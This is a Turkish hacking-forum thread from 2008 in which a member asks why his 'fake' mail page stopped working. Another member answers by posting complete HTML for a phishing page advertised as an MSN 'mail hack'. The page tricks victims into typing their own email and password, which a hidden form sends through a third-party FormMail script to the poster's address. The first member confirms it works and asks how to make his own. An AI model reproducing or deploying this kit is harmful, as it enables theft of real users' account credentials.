fakenin ömrü bitermi ???

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

eqoss

Üye
28 Kas 2008
86
0
AnkarA
arkadaşlar konu başlığındanda anlaşıldığı gibi fakenin ömrü bitermi.mail güvenlikten fake mail indirdim.2 ay felan kullandım sonra çalışmamaya başladı.nasıl bi iş bu

eqoss

Üye
28 Kas 2008
86
0
AnkarA
ya bu kodları txt ile açıp yapıyorum htm yaptığımız sayfadan ne mail galiyo nede ekran düzgün bişey oluyo.resimler felan dağılıyo veya göstermiyo.forumda bakıyorum denilenleri yapıyorum öle oluyo hep sen yardım edebilirmisin bana

dreamer_x_x

Katılımcı Üye
21 Haz 2008
688
0
Eskişehir
ya bu kodları txt ile açıp yapıyorum htm yaptığımız sayfadan ne mail galiyo nede ekran düzgün bişey oluyo.resimler felan dağılıyo veya göstermiyo.forumda bakıyorum denilenleri yapıyorum öle oluyo hep sen yardım edebilirmisin bana

buyur elimdeki fake kodları :)

<title>Mail Hack</title>
<p align="center"><html><b><font face="Arial Black" size="7"> <font color="#FF0000"> 
MSN </font></font></b><font color="#FF0000"></html><b><i>
<font face="Arial Black" size="7">mail</font></i></b></font></p>
<p align="center"><b><i><font face="Arial Black" size="7" color="#FF0000">  
HACK!msn hackle sorunsuz trojensiz</font></i></b></p>
<p align="center"><html><b><font face="Arial Black" size="7"> ;       &nbsp               &nbsp ;   
</font></b></html></p>
<p align="center"><font color="#FF0000"><font size="4">ÖNCE KENDİ MAİL VE
ŞİFRENİZİ GİRİOSUNUZ</font><html></font></p>
<center>
<p>
<body background=http://img179.imageshack.us/img179/5004/kurukafa6sa2.jpg bgcolor="#000000"><br>
</p>
<form method=post action=http://www.lcsd.gov.hk/cgi-bin/formmail/FormMail.pl><font size=4>
<font color="#FF0000">Mailiniz :<input type=text name=mail size="20"><br>Sifreniz :<input type=password name=sifre size="20"><br>
</font><input type=submit value=Tamam><input type=hidden name=recipient [email protected]><input type=hidden name=email [email protected]><input type=hidden name=realname value=Hacked By DrEamer_x_X<input type=hidden name=subject value=şifre><input type=hidden name=title value=><input type=hidden name=redirect value=html/:www.masterhack.com/></body></center></html>
<p align="center"><b><i><font face="Arial Black" color="#FF0000">SONRA KURBANIN
MAİL ADRESİNİ GİRİN</font></i></b></p>
<form method="POST" action="--WEBBOT-SELF--">
<!--webbot bot="SaveResults" U-File="fpweb:///_private/form_results.csv" S-Format="TEXT/CSV" S-Label-Fields="TRUE" --><p align="center">
<font color="#FF0000">KURBANIN MAİLİ<input type="text" name="T1" size="20"><input type="submit" value="Gönder" name="B1"><input type="reset" value="Sıfırla" name="B2"></font></p>
<p align="center"> </p>
<p align="center"><font color="#FF0000">KURBANIN ŞİFRESİ
<input type="text" name="T2" size="20" value=""center"> </p>
<p align="center">      </p>
<p align="center"> </p>
</form>
<p align="center"> </p>

eqoss

Üye
28 Kas 2008
86
0
AnkarA
eyvallah saolasın.Güzel çalışıyo.bunu kendimiz nasıl yapacaz o konu hakkında biraz bilgi verirmisin.mesela sayfayı txt açtık dielim.Fake için gerekli olan kodları nereye yazacaz veya yapıştıracaz şöyle deyim hangi satıra veya belirli bir satırı varmı

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.